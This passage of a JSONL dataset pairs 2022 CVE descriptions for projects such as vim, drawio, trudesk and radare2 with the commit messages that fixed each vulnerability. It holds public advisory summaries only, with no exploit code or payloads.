users.'}]\n\nFix commit: Do not create article meta description for password-protected articles", "cve_id": "CVE-2022-1553", "source": "cvefixes", "timestamp": ""} {"id": "6f6324891eefada07669", "text": "CVE: CVE-2022-1555\n\n[{'lang': 'en', 'value': 'DOM XSS in microweber ver 1.2.15 in GitHub repository microweber/microweber prior to 1.2.16. inject arbitrary js code, deface website, steal cookie...'}]\n\nFix commit: Update order_filtering.blade.php", "cve_id": "CVE-2022-1555", "source": "cvefixes", "timestamp": ""} {"id": "0254d7b4af645bd2c274", "text": "CVE: CVE-2022-1571\n\n[{'lang': 'en', 'value': \"Cross-site scripting - Reflected in Create Subaccount in GitHub repository neorazorx/facturascripts prior to 2022.07. This vulnerability can be arbitrarily executed javascript code to steal user'cookie, perform HTTP request, get content of `same origin` page, etc ...\"}]\n\nFix commit: Escaped html code from model fields to improve security.\n------\nEscapado el html de los campos del modelo para mejorar la seguridad.", "cve_id": "CVE-2022-1571", "source": "cvefixes", "timestamp": ""} {"id": "c68e20a9317c5d31bbbc", "text": "CVE: CVE-2022-1584\n\n[{'lang': 'en', 'value': 'Reflected XSS in GitHub repository microweber/microweber prior to 1.2.16. Executing JavaScript as the victim'}]\n\nFix commit: update", "cve_id": "CVE-2022-1584", "source": "cvefixes", "timestamp": ""} {"id": "e31be0cbfd2fdca4bf36", "text": "CVE: CVE-2022-1586\n\n[{'lang': 'en', 'value': 'An out-of-bounds read vulnerability was discovered in the PCRE2 library in the compile_xclass_matchingpath() function of the pcre2_jit_compile.c file. This involves a unicode property matching issue in JIT-compiled regular expressions. The issue occurs because the character was not fully read in case-less matching within JIT.'}]\n\nFix commit: Fixed a unicode properrty matching issue in JIT", "cve_id": "CVE-2022-1586", "source": "cvefixes", "timestamp": ""} {"id": "45ffb9ddc49e383045f9", "text": "CVE: CVE-2022-1586\n\n[{'lang': 'en', 'value': 'An out-of-bounds read vulnerability was discovered in the PCRE2 library in the compile_xclass_matchingpath() function of the pcre2_jit_compile.c file. This involves a unicode property matching issue in JIT-compiled regular expressions. The issue occurs because the character was not fully read in case-less matching within JIT.'}]\n\nFix commit: Fix incorrect value reading in JIT.", "cve_id": "CVE-2022-1586", "source": "cvefixes", "timestamp": ""} {"id": "39ae773e9934415fed8c", "text": "CVE: CVE-2022-1587\n\n[{'lang': 'en', 'value': 'An out-of-bounds read vulnerability was discovered in the PCRE2 library in the get_recurse_data_length() function of the pcre2_jit_compile.c file. This issue affects recursions in JIT-compiled regular expressions caused by duplicate data transfers.'}]\n\nFix commit: Fixed an issue affecting recursions in JIT", "cve_id": "CVE-2022-1587", "source": "cvefixes", "timestamp": ""} {"id": "21f57413575265d85d69", "text": "CVE: CVE-2022-1592\n\n[{'lang': 'en', 'value': 'Server-Side Request Forgery in scout in GitHub repository clinical-genomics/scout prior to v4.42. An attacker could make the application perform arbitrary requests to fishing steal cookie, request to private area, or lead to xss...'}]\n\nFix commit: Protect remote_cors from Server-Side Request Forgery (#3326)\n\n* Protect remote_cors from Server-Side Request Forgery\r\n\r\n* Improved code and added test\r\n\r\n* Fix a couple of comments in a test", "cve_id": "CVE-2022-1592", "source": "cvefixes", "timestamp": ""} {"id": "5f15c1b45a51e1f71d8c", "text": "CVE: CVE-2022-1616\n\n[{'lang': 'en', 'value': 'Use after free in append_command in GitHub repository vim/vim prior to 8.2.4895. This vulnerability is capable of crashing software, Bypass Protection Mechanism, Modify Memory, and possible remote execution'}]\n\nFix commit: patch 8.2.4895: buffer overflow with invalid command with composing chars\n\nProblem: Buffer overflow with invalid command with composing chars.\nSolution: Check that the whole character fits in the buffer.", "cve_id": "CVE-2022-1616", "source": "cvefixes", "timestamp": ""} {"id": "cfba3c9b2796b71b59d8", "text": "CVE: CVE-2022-1619\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in function cmdline_erase_chars in GitHub repository vim/vim prior to 8.2.4899. This vulnerabilities are capable of crashing software, modify memory, and possible remote execution'}]\n\nFix commit: patch 8.2.4899: with latin1 encoding CTRL-W might go before the cmdline\n\nProblem: With latin1 encoding CTRL-W might go before the start of the\n command line.\nSolution: Check already being at the start of the command", "cve_id": "CVE-2022-1619", "source": "cvefixes", "timestamp": ""} {"id": "27369b220b78760bd0c3", "text": "CVE: CVE-2022-1620\n\n[{'lang': 'en', 'value': 'NULL Pointer Dereference in function vim_regexec_string at regexp.c:2729 in GitHub repository vim/vim prior to 8.2.4901. NULL Pointer Dereference in function vim_regexec_string at regexp.c:2729 allows attackers to cause a denial of service (application crash) via a crafted input.'}]\n\nFix commit: patch 8.2.4901: NULL pointer access when using invalid pattern\n\nProblem: NULL pointer access when using invalid pattern.\nSolution: Check for failed rege", "cve_id": "CVE-2022-1620", "source": "cvefixes", "timestamp": ""} {"id": "47c7b768a11bb7071ad2", "text": "CVE: CVE-2022-1621\n\n[{'lang': 'en', 'value': 'Heap buffer overflow in vim_strncpy find_word in GitHub repository vim/vim prior to 8.2.4919. This vulnerability is capable of crashing software, Bypass Protection Mechanism, Modify Memory, and possible remote execution'}]\n\nFix commit: patch 8.2.4919: can add invalid bytes with :spellgood\n\nProblem: Can add invalid bytes with :spellgood.\nSolution: Check for a valid word string.", "cve_id": "CVE-2022-1621", "source": "cvefixes", "timestamp": ""} {"id": "e36e979ff666f58e45bc", "text": "CVE: CVE-2022-1629\n\n[{'lang': 'en', 'value': 'Buffer Over-read in function find_next_quote in GitHub repository vim/vim prior to 8.2.4925. This vulnerabilities are capable of crashing software, Modify Memory, and possible remote execution'}]\n\nFix commit: patch 8.2.4925: trailing backslash may cause reading past end of line\n\nProblem: Trailing backslash may cause reading past end of line.\nSolution: Check for NUL after backslash.", "cve_id": "CVE-2022-1629", "source": "cvefixes", "timestamp": ""} {"id": "f67181d9a4c64942e0b3", "text": "CVE: CVE-2022-1631\n\n[{'lang': 'en', 'value': 'Users Account Pre-Takeover or Users Account Takeover. in GitHub repository microweber/microweber prior to 1.2.15. Victim Account Take Over. Since, there is no email confirmation, an attacker can easily create an account in the application using the Victim’s Email. This allows an attacker to gain pre-authentication to the victim’s account. Further, due to the lack of proper validation of email coming from Social Login and failing to check if an accoun", "cve_id": "CVE-2022-1631", "source": "cvefixes", "timestamp": ""} {"id": "5c150722b401f078643d", "text": "CVE: CVE-2022-1649\n\n[{'lang': 'en', 'value': 'Null pointer dereference in libr/bin/format/mach0/mach0.c in radareorg/radare2 in GitHub repository radareorg/radare2 prior to 5.7.0. It is likely to be exploitable. For more general description of heap buffer overflow, see [CWE](https://cwe.mitre.org/data/definitions/476.html).'}]\n\nFix commit: Fix null deref in macho parser ##crash\n\n* Reported by Han0nly via huntrdev\n* BountyID: c07e4918-cf86-4d2e-8969-5fb63575b449\n* Reproducer: machonull", "cve_id": "CVE-2022-1649", "source": "cvefixes", "timestamp": ""} {"id": "03fb3165cb248fda2e53", "text": "CVE: CVE-2022-1650\n\n[{'lang': 'en', 'value': 'Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository eventsource/eventsource prior to v2.0.2.'}]\n\nFix commit: fix: strip sensitive headers on redirect to different origin", "cve_id": "CVE-2022-1650", "source": "cvefixes", "timestamp": ""} {"id": "3c022a1ec54bb08bcba0", "text": "CVE: CVE-2022-1674\n\n[{'lang': 'en', 'value': 'NULL Pointer Dereference in function vim_regexec_string at regexp.c:2733 in GitHub repository vim/vim prior to 8.2.4938. NULL Pointer Dereference in function vim_regexec_string at regexp.c:2733 allows attackers to cause a denial of service (application crash) via a crafted input.'}]\n\nFix commit: patch 8.2.4938: crash when matching buffer with invalid pattern\n\nProblem: Crash when matching buffer with invalid pattern.\nSolution: Check for NULL regp", "cve_id": "CVE-2022-1674", "source": "cvefixes", "timestamp": ""} {"id": "615ad71521876b729886", "text": "CVE: CVE-2022-1681\n\n[{'lang': 'en', 'value': 'Authentication Bypass Using an Alternate Path or Channel in GitHub repository requarks/wiki prior to 2.5.281. User can get root user permissions'}]\n\nFix commit: fix: prevent manage system assignment from manage groups permission", "cve_id": "CVE-2022-1681", "source": "cvefixes", "timestamp": ""} {"id": "81f4019811faf330e542", "text": "CVE: CVE-2022-1682\n\n[{'lang': 'en', 'value': \"Reflected Xss using url based payload in GitHub repository neorazorx/facturascripts prior to 2022.07. Xss can use to steal user's cookies which lead to Account takeover or do any malicious activity in victim's browser\"}]\n\nFix commit: We check the url parameter of the link to ensure that it is a valid controller.\n------\nComprobamos el parámetro url del enlace para asegurar que sea un controlador válido.", "cve_id": "CVE-2022-1682", "source": "cvefixes", "timestamp": ""} {"id": "53c18118bf599a0e11b1", "text": "CVE: CVE-2022-1698\n\n[{'lang': 'en', 'value': 'Allowing long password leads to denial of service in GitHub repository causefx/organizr prior to 2.1.2000. This vulnerability can be abused by doing a DDoS attack for which genuine users will not able to access resources/applications.'}]\n\nFix commit: fix more lengths of user inputs", "cve_id": "CVE-2022-1698", "source": "cvefixes", "timestamp": ""} {"id": "3a01de15be917dd5467f", "text": "CVE: CVE-2022-1699\n\n[{'lang': 'en', 'value': 'Uncontrolled Resource Consumption in GitHub repository causefx/organizr prior to 2.1.2000. This vulnerability can be abused by doing a DDoS attack for which genuine users will not able to access resources/applications.'}]\n\nFix commit: fix more lengths of user inputs", "cve_id": "CVE-2022-1699", "source": "cvefixes", "timestamp": ""} {"id": "42cfd7f647364c461db2", "text": "CVE: CVE-2022-1706\n\n[{'lang': 'en', 'value': 'A vulnerability was found in Ignition where ignition configs are accessible from unprivileged containers in VMs running on VMware products. This issue is only relevant in user environments where the Ignition config contains secrets. The highest threat from this vulnerability is to data confidentiality. Possible workaround is to not put secrets in the Ignition config.'}]\n\nFix commit: Merge pull request #1350 from bgilbert/userdata\n\nDelete userdata fro", "cve_id": "CVE-2022-1706", "source": "cvefixes", "timestamp": ""} {"id": "279cd8f49235483ffd00", "text": "CVE: CVE-2022-1708\n\n[{'lang': 'en', 'value': 'A vulnerability was found in CRI-O that causes memory or disk space exhaustion on the node for anyone with access to the Kube API. The ExecSync request runs commands in a container and logs the output of the command. This output is then read by CRI-O after command execution, and it is read in a manner where the entire file corresponding to the output of the command is read in. Thus, if the output of the command is large it is possible to exhaust the ", "cve_id": "CVE-2022-1708", "source": "cvefixes", "timestamp": ""} {"id": "a094d325b58581baf2b4", "text": "CVE: CVE-2022-1711\n\n[{'lang': 'en', 'value': 'Server-Side Request Forgery (SSRF) in GitHub repository jgraph/drawio prior to 18.0.5.'}]\n\nFix commit: Adds isLinkLocalAddress() to address checks", "cve_id": "CVE-2022-1711", "source": "cvefixes", "timestamp": ""} {"id": "0ac893ec2294b9ad78e8", "text": "CVE: CVE-2022-1713\n\n[{'lang': 'en', 'value': 'SSRF on /proxy in GitHub repository jgraph/drawio prior to 18.0.4. An attacker can make a request as the server and read its contents. This can lead to a leak of sensitive information.'}]\n\nFix commit: 18.0.3 release", "cve_id": "CVE-2022-1713", "source": "cvefixes", "timestamp": ""} {"id": "57d816de7ea7c73b660d", "text": "CVE: CVE-2022-1714\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository radareorg/radare2 prior to 5.7.0. The bug causes the program reads data past the end of the intented buffer. Typically, this can allow attackers to read sensitive information from other memory locations or cause a crash.'}]\n\nFix commit: Fix 4 byte oobread in msp430 disassembler ##crash\n\n* Only crashes with asan builds\n* Add missing =SN register\n* Reported by cnitlrt via huntrdev\n* BountyID: 1c22055b-b01", "cve_id": "CVE-2022-1714", "source": "cvefixes", "timestamp": ""} {"id": "7ff7d15324de1cf862b1", "text": "CVE: CVE-2022-1715\n\n[{'lang': 'en', 'value': 'Account Takeover in GitHub repository neorazorx/facturascripts prior to 2022.07.'}]\n\nFix commit: Fixed string comparison to avoid automatic cast during database password check.\n------\nCorregida la comparación de cadenas para evitar cast automático durante la comprobación de la contraseña de la basew de datos.", "cve_id": "CVE-2022-1715", "source": "cvefixes", "timestamp": ""} {"id": "1b3e6dd15c344b356911", "text": "CVE: CVE-2022-1720\n\n[{'lang': 'en', 'value': 'Buffer Over-read in function grab_file_name in GitHub repository vim/vim prior to 8.2.4956. This vulnerability is capable of crashing the software, memory modification, and possible remote execution.'}]\n\nFix commit: patch 8.2.4956: reading past end of line with \"gf\" in Visual block mode\n\nProblem: Reading past end of line with \"gf\" in Visual block mode.\nSolution: Do not include the NUL in the length.", "cve_id": "CVE-2022-1720", "source": "cvefixes", "timestamp": ""} {"id": "8389923a6515d0efa85e", "text": "CVE: CVE-2022-1721\n\n[{'lang': 'en', 'value': 'Path Traversal in WellKnownServlet in GitHub repository jgraph/drawio prior to 18.0.5. Read local files of the web application.'}]\n\nFix commit: Limit wellknown servlet to serve single file", "cve_id": "CVE-2022-1721", "source": "cvefixes", "timestamp": ""} {"id": "c6481b4913d249e79496", "text": "CVE: CVE-2022-1722\n\n[{'lang': 'en', 'value': \"SSRF in editor's proxy via IPv6 link-local address in GitHub repository jgraph/drawio prior to 18.0.5. SSRF to internal link-local IPv6 addresses\"}]\n\nFix commit: Adds isLinkLocalAddress() to address checks", "cve_id": "CVE-2022-1722", "source": "cvefixes", "timestamp": ""} {"id": "5bfcc59494a327f4df92", "text": "CVE: CVE-2022-1723\n\n[{'lang': 'en', 'value': 'Server-Side Request Forgery (SSRF) in GitHub repository jgraph/drawio prior to 18.0.6.'}]\n\nFix commit: 18.0.6 release", "cve_id": "CVE-2022-1723", "source": "cvefixes", "timestamp": ""} {"id": "03036f25c444426993b1", "text": "CVE: CVE-2022-1727\n\n[{'lang': 'en', 'value': 'Improper Input Validation in GitHub repository jgraph/drawio prior to 18.0.6.'}]\n\nFix commit: 18.0.4 release", "cve_id": "CVE-2022-1727", "source": "cvefixes", "timestamp": ""} {"id": "2bc2a505191d5204ec36", "text": "CVE: CVE-2022-1728\n\n[{'lang': 'en', 'value': 'Allowing long password leads to denial of service in polonel/trudesk in GitHub repository polonel/trudesk prior to 1.2.2. This vulnerability can be abused by doing a DDoS attack for which genuine users will not able to access resources/applications.'}]\n\nFix commit: fix(account): security fix", "cve_id": "CVE-2022-1728", "source": "cvefixes", "timestamp": ""} {"id": "451ec2d422e34f6d1c0b", "text": "CVE: CVE-2022-1730\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository jgraph/drawio prior to 18.0.4.'}]\n\nFix commit: 18.0.4 release", "cve_id": "CVE-2022-1730", "source": "cvefixes", "timestamp": ""} {"id": "8bfdf94f18411fd2e5d4", "text": "CVE: CVE-2022-1733\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.4968.'}]\n\nFix commit: patch 8.2.4968: reading past end of the line when C-indenting\n\nProblem: Reading past end of the line when C-indenting.\nSolution: Check for NUL.", "cve_id": "CVE-2022-1733", "source": "cvefixes", "timestamp": ""} {"id": "ca9661f5eafde1e46c0f", "text": "CVE: CVE-2022-1734\n\n[{'lang': 'en', 'value': 'A flaw in Linux Kernel found in nfcmrvl_nci_unregister_dev() in drivers/nfc/nfcmrvl/main.c can lead to use after free both read or write when non synchronized between cleanup routine and firmware download routine.'}]\n\nFix commit: nfc: nfcmrvl: main: reorder destructive operations in nfcmrvl_nci_unregister_dev to avoid bugs\n\nThere are destructive operations such as nfcmrvl_fw_dnld_abort and\ngpio_free in nfcmrvl_nci_unregister_dev. The resources such a", "cve_id": "CVE-2022-1734", "source": "cvefixes", "timestamp": ""} {"id": "0b9e1a064242fddbc58b", "text": "CVE: CVE-2022-1735\n\n[{'lang': 'en', 'value': 'Classic Buffer Overflow in GitHub repository vim/vim prior to 8.2.4969.'}]\n\nFix commit: patch 8.2.4969: changing text in Visual mode may cause invalid memory access\n\nProblem: Changing text in Visual mode may cause invalid memory access.\nSolution: Check the Visual position after making a change.", "cve_id": "CVE-2022-1735", "source": "cvefixes", "timestamp": ""} {"id": "168a5dbcf813980453ef", "text": "CVE: CVE-2022-1752\n\n[{'lang': 'en', 'value': 'Unrestricted Upload of File with Dangerous Type in GitHub repository polonel/trudesk prior to 1.2.2.'}]\n\nFix commit: refactor(accounts): security enhancements", "cve_id": "CVE-2022-1752", "source": "cvefixes", "timestamp": ""} {"id": "9c98f39a49c7dc12e8c2", "text": "CVE: CVE-2022-1754\n\n[{'lang': 'en', 'value': 'Integer Overflow or Wraparound in GitHub repository polonel/trudesk prior to 1.2.2.'}]\n\nFix commit: fix(account): security fix", "cve_id": "CVE-2022-1754", "source": "cvefixes", "timestamp": ""} {"id": "aeddab44b9fe29a7ee7e", "text": "CVE: CVE-2022-1767\n\n[{'lang': 'en', 'value': 'Server-Side Request Forgery (SSRF) in GitHub repository jgraph/drawio prior to 18.0.7.'}]\n\nFix commit: 18.0.7 release", "cve_id": "CVE-2022-1767", "source": "cvefixes", "timestamp": ""} {"id": "fb91c36ad30274ba0d77", "text": "CVE: CVE-2022-1769\n\n[{'lang': 'en', 'value': 'Buffer Over-read in GitHub repository vim/vim prior to 8.2.4974.'}]\n\nFix commit: patch 8.2.4974: \":so\" command may read after end of buffer\n\nProblem: \":so\" command may read after end of buffer.\nSolution: Compute length of text properly.", "cve_id": "CVE-2022-1769", "source": "cvefixes", "timestamp": ""} {"id": "7e897a9faecb5585a817", "text": "CVE: CVE-2022-1770\n\n[{'lang': 'en', 'value': 'Improper Privilege Management in GitHub repository polonel/trudesk prior to 1.2.2.'}]\n\nFix commit: refactor(core): apiv2 route enhancements", "cve_id": "CVE-2022-1770", "source": "cvefixes", "timestamp": ""} {"id": "c436550666bcb1e5952e", "text": "CVE: CVE-2022-1771\n\n[{'lang': 'en', 'value': 'Uncontrolled Recursion in GitHub repository vim/vim prior to 8.2.4975.'}]\n\nFix commit: patch 8.2.4975: recursive command line loop may cause a crash\n\nProblem: Recursive command line loop may cause a crash.\nSolution: Limit recursion of getcmdline().", "cve_id": "CVE-2022-1771", "source": "cvefixes", "timestamp": ""} {"id": "0836569fe5deb770b1e4", "text": "CVE: CVE-2022-1774\n\n[{'lang': 'en', 'value': 'Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository jgraph/drawio prior to 18.0.7.'}]\n\nFix commit: 18.0.7 release", "cve_id": "CVE-2022-1774", "source": "cvefixes", "timestamp": ""} {"id": "5fb7d0145eec66159bea", "text": "CVE: CVE-2022-1775\n\n[{'lang': 'en', 'value': 'Weak Password Requirements in GitHub repository polonel/trudesk prior to 1.2.2.'}]\n\nFix commit: refactor(accounts): password security enhancements", "cve_id": "CVE-2022-1775", "source": "cvefixes", "timestamp": ""} {"id": "1ae4312229243bc1cef3", "text": "CVE: CVE-2022-1782\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Generic in GitHub repository erudika/para prior to v1.45.11.'}]\n\nFix commit: added option to escape HTML when compiling Mustache templates", "cve_id": "CVE-2022-1782", "source": "cvefixes", "timestamp": ""} {"id": "394661dafd62f97e5ae4", "text": "CVE: CVE-2022-1784\n\n[{'lang': 'en', 'value': 'Server-Side Request Forgery (SSRF) in GitHub repository jgraph/drawio prior to 18.0.8.'}]\n\nFix commit: 18.0.7 release", "cve_id": "CVE-2022-1784", "source": "cvefixes", "timestamp": ""} {"id": "ba977310988c2823d341", "text": "CVE: CVE-2022-1785\n\n[{'lang': 'en', 'value': 'Out-of-bounds Write in GitHub repository vim/vim prior to 8.2.4977.'}]\n\nFix commit: patch 8.2.4977: memory access error when substitute expression changes window\n\nProblem: Memory access error when substitute expression changes window.\nSolution: Disallow changing window in substitute expression.", "cve_id": "CVE-2022-1785", "source": "cvefixes", "timestamp": ""} {"id": "452a84891accba5271e3", "text": "CVE: CVE-2022-1795\n\n[{'lang': 'en', 'value': 'Use After Free in GitHub repository gpac/gpac prior to v2.1.0-DEV.'}]\n\nFix commit: fixed #2194", "cve_id": "CVE-2022-1795", "source": "cvefixes", "timestamp": ""} {"id": "d5ba2bde67844cb829c6", "text": "CVE: CVE-2022-1796\n\n[{'lang': 'en', 'value': 'Use After Free in GitHub repository vim/vim prior to 8.2.4979.'}]\n\nFix commit: patch 8.2.4979: accessing freed memory when line is flushed\n\nProblem: Accessing freed memory when line is flushed.\nSolution: Make a copy of the pattern to search for.", "cve_id": "CVE-2022-1796", "source": "cvefixes", "timestamp": ""} {"id": "20ed13b28d1054ccfc67", "text": "CVE: CVE-2022-1803\n\n[{'lang': 'en', 'value': 'Improper Restriction of Rendered UI Layers or Frames in GitHub repository polonel/trudesk prior to 1.2.2.'}]\n\nFix commit: fix(core): iframe security fix", "cve_id": "CVE-2022-1803", "source": "cvefixes", "timestamp": ""} {"id": "ac2a50733c3818745772", "text": "CVE: CVE-2022-1806\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Reflected in GitHub repository rtxteam/rtx prior to checkpoint_2022-05-18.'}]\n\nFix commit: remove some cruft and implement a sanitizer for the client-supplied callback function name", "cve_id": "CVE-2022-1806", "source": "cvefixes", "timestamp": ""} {"id": "07d7210efd01c67d3555", "text": "CVE: CVE-2022-1808\n\n[{'lang': 'en', 'value': 'Execution with Unnecessary Privileges in GitHub repository polonel/trudesk prior to 1.2.3.'}]\n\nFix commit: fix(core): verify user exists", "cve_id": "CVE-2022-1808", "source": "cvefixes", "timestamp": ""} {"id": "4078596d6b73edbc61cb", "text": "CVE: CVE-2022-1809\n\n[{'lang': 'en', 'value': 'Access of Uninitialized Pointer in GitHub repository radareorg/radare2 prior to 5.7.0.'}]\n\nFix commit: Fix crash in vtable analysis on UB ##crash\n\n* Reported by @greatergoodest via huntrdev\n* BountyID 0730a95e-c485-4ff2-9a5d-bb3abfda0b17\n* Reproducer: minified_crash", "cve_id": "CVE-2022-1809", "source": "cvefixes", "timestamp": ""} {"id": "f160c18c71b4c4fbfc3e", "text": "CVE: CVE-2022-1810\n\n[{'lang': 'en', 'value': 'Improper Access Control in GitHub repository publify/publify prior to 9.2.9.'}]\n\nFix commit: Use only the main id parameter to find Article to update", "cve_id": "CVE-2022-1810", "source": "cvefixes", "timestamp": ""} {"id": "bae363e552cd7d7c7347", "text": "CVE: CVE-2022-1811\n\n[{'lang': 'en', 'value': 'Unrestricted Upload of File with Dangerous Type in GitHub repository publify/publify prior to 9.2.9.'}]\n\nFix commit: Refuse html files as resources even if declared to be plain text", "cve_id": "CVE-2022-1811", "source": "cvefixes", "timestamp": ""} {"id": "6e118f15f2958279b0c1", "text": "CVE: CVE-2022-1813\n\n[{'lang': 'en', 'value': 'OS Command Injection in GitHub repository yogeshojha/rengine prior to 1.2.0.'}]\n\nFix commit: Fix command injection issue on detect cms", "cve_id": "CVE-2022-1813", "source": "cvefixes", "timestamp": ""} {"id": "cc88250b20bf93635fe3", "text": "CVE: CVE-2022-1815\n\n[{'lang': 'en', 'value': 'Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository jgraph/drawio prior to 18.1.2.'}]\n\nFix commit: 18.1.2 release", "cve_id": "CVE-2022-1815", "source": "cvefixes", "timestamp": ""} {"id": "14a5ad9844567cf0cd25", "text": "CVE: CVE-2022-1825\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Reflected in GitHub repository collectiveaccess/providence prior to 1.8.'}]\n\nFix commit: Print potential XSS in error message handler", "cve_id": "CVE-2022-1825", "source": "cvefixes", "timestamp": ""} {"id": "b11eea756781faf16341", "text": "CVE: CVE-2022-1848\n\n[{'lang': 'en', 'value': 'Business Logic Errors in GitHub repository erudika/para prior to 1.45.11.'}]\n\nFix commit: fixed password length issues", "cve_id": "CVE-2022-1848", "source": "cvefixes", "timestamp": ""} {"id": "06d92fe77c924396b3fb", "text": "CVE: CVE-2022-1849\n\n[{'lang': 'en', 'value': 'Session Fixation in GitHub repository filegator/filegator prior to 7.8.0.'}]\n\nFix commit: regenerate session on user update", "cve_id": "CVE-2022-1849", "source": "cvefixes", "timestamp": ""} {"id": "92660f909479edf3350b", "text": "CVE: CVE-2022-1850\n\n[{'lang': 'en', 'value': 'Path Traversal in GitHub repository filegator/filegator prior to 7.8.0.'}]\n\nFix commit: path traversal fix", "cve_id": "CVE-2022-1850", "source": "cvefixes", "timestamp": ""} {"id": "dac79bf056aef5518943", "text": "CVE: CVE-2022-1851\n\n[{'lang': 'en', 'value': 'Out-of-bounds Read in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.5013: after text formatting cursor may be in an invalid position\n\nProblem: After text formatting the cursor may be in an invalid position.\nSolution: Correct the cursor position after formatting.", "cve_id": "CVE-2022-1851", "source": "cvefixes", "timestamp": ""} {"id": "5c7e5ff9607743fb47a2", "text": "CVE: CVE-2022-1852\n\n[{'lang': 'en', 'value': 'A NULL pointer dereference flaw was found in the Linux kernel’s KVM module, which can lead to a denial of service in the x86_emulate_insn in arch/x86/kvm/emulate.c. This flaw occurs while executing an illegal instruction in guest in the Intel CPU.'}]\n\nFix commit: KVM: x86: avoid calling x86 emulator without a decoded instruction\n\nWhenever x86_decode_emulated_instruction() detects a breakpoint, it\nreturns the value that kvm_vcpu_check_breakpoint() wri", "cve_id": "CVE-2022-1852", "source": "cvefixes", "timestamp": ""} {"id": "01e883b205eae8f88126", "text": "CVE: CVE-2022-1883\n\n[{'lang': 'en', 'value': 'SQL Injection in GitHub repository camptocamp/terraboard prior to 2.2.0.'}]\n\nFix commit: fix(db): possible sql injection on /search endpoint", "cve_id": "CVE-2022-1883", "source": "cvefixes", "timestamp": ""} {"id": "398f4f5233c34487593b", "text": "CVE: CVE-2022-1886\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.5016: access before start of text with a put command\n\nProblem: Access before start of text with a put command.\nSolution: Check the length is more than zero.", "cve_id": "CVE-2022-1886", "source": "cvefixes", "timestamp": ""} {"id": "9a3a9047b1a5b0f2d0bf", "text": "CVE: CVE-2022-1893\n\n[{'lang': 'en', 'value': 'Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository polonel/trudesk prior to 1.2.3.'}]\n\nFix commit: fix(core): image data removal", "cve_id": "CVE-2022-1893", "source": "cvefixes", "timestamp": ""} {"id": "819de41c82c3fd721516", "text": "CVE: CVE-2022-1897\n\n[{'lang': 'en', 'value': 'Out-of-bounds Write in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.5023: substitute overwrites allocated buffer\n\nProblem: Substitute overwrites allocated buffer.\nSolution: Disallow undo when in a substitute command.", "cve_id": "CVE-2022-1897", "source": "cvefixes", "timestamp": ""} {"id": "03ae89bdf0075d8bea62", "text": "CVE: CVE-2022-1898\n\n[{'lang': 'en', 'value': 'Use After Free in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.5024: using freed memory with \"]d\"\n\nProblem: Using freed memory with \"]d\".\nSolution: Copy the pattern before searching.", "cve_id": "CVE-2022-1898", "source": "cvefixes", "timestamp": ""} {"id": "bc4d69c0013f72daf248", "text": "CVE: CVE-2022-1899\n\n[{'lang': 'en', 'value': 'Out-of-bounds Read in GitHub repository radareorg/radare2 prior to 5.7.0.'}]\n\nFix commit: Fix integer overflow in string search causing oobread ##crash\n\n* Reported by @greatergoodest via huntrdev\r\n* BountyID: 8a3dc5cb-08b3-4807-82b2-77f08c137a04\r\n* Reproducer bfileovf", "cve_id": "CVE-2022-1899", "source": "cvefixes", "timestamp": ""} {"id": "051fa0abaa424b0b0b7b", "text": "CVE: CVE-2022-1907\n\n[{'lang': 'en', 'value': 'Buffer Over-read in GitHub repository bfabiszewski/libmobi prior to 0.11.'}]\n\nFix commit: Fix boundary checking error in markup search, that could cause buffer over-read with corrupt input", "cve_id": "CVE-2022-1907", "source": "cvefixes", "timestamp": ""} {"id": "c9a9785cf513c286bce6", "text": "CVE: CVE-2022-1908\n\n[{'lang': 'en', 'value': 'Buffer Over-read in GitHub repository bfabiszewski/libmobi prior to 0.11.'}]\n\nFix commit: Fix boundary checking error in markup search, that could cause buffer over-read with corrupt input", "cve_id": "CVE-2022-1908", "source": "cvefixes", "timestamp": ""} {"id": "1964804692373ce09732", "text": "CVE: CVE-2022-1909\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository causefx/organizr prior to 2.1.2200.'}]\n\nFix commit: sanitize tab image and group image", "cve_id": "CVE-2022-1909", "source": "cvefixes", "timestamp": ""} {"id": "86effca427ca2e88c472", "text": "CVE: CVE-2022-1926\n\n[{'lang': 'en', 'value': 'Integer Overflow or Wraparound in GitHub repository polonel/trudesk prior to 1.2.3.'}]\n\nFix commit: fix(messages): xss security", "cve_id": "CVE-2022-1926", "source": "cvefixes", "timestamp": ""} {"id": "a999daef45d0a2d57ad4", "text": "CVE: CVE-2022-1927\n\n[{'lang': 'en', 'value': 'Buffer Over-read in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.5037: cursor position may be invalid after \"0;\" range\n\nProblem: Cursor position may be invalid after \"0;\" range.\nSolution: Check the cursor position when it was set by \";\" in the range.", "cve_id": "CVE-2022-1927", "source": "cvefixes", "timestamp": ""} {"id": "fd053047c2fad2a6a31d", "text": "CVE: CVE-2022-1928\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository go-gitea/gitea prior to 1.16.9.'}]\n\nFix commit: Fix raw endpoint PDF file headers (#19825)", "cve_id": "CVE-2022-1928", "source": "cvefixes", "timestamp": ""} {"id": "f8e6924a1ccd6f388bf8", "text": "CVE: CVE-2022-1931\n\n[{'lang': 'en', 'value': 'Incorrect Synchronization in GitHub repository polonel/trudesk prior to 1.2.3.'}]\n\nFix commit: fix(messages): validation check", "cve_id": "CVE-2022-1931", "source": "cvefixes", "timestamp": ""} {"id": "f3c754dee045d8c8fb65", "text": "CVE: CVE-2022-1934\n\n[{'lang': 'en', 'value': 'Use After Free in GitHub repository mruby/mruby prior to 3.2.'}]\n\nFix commit: 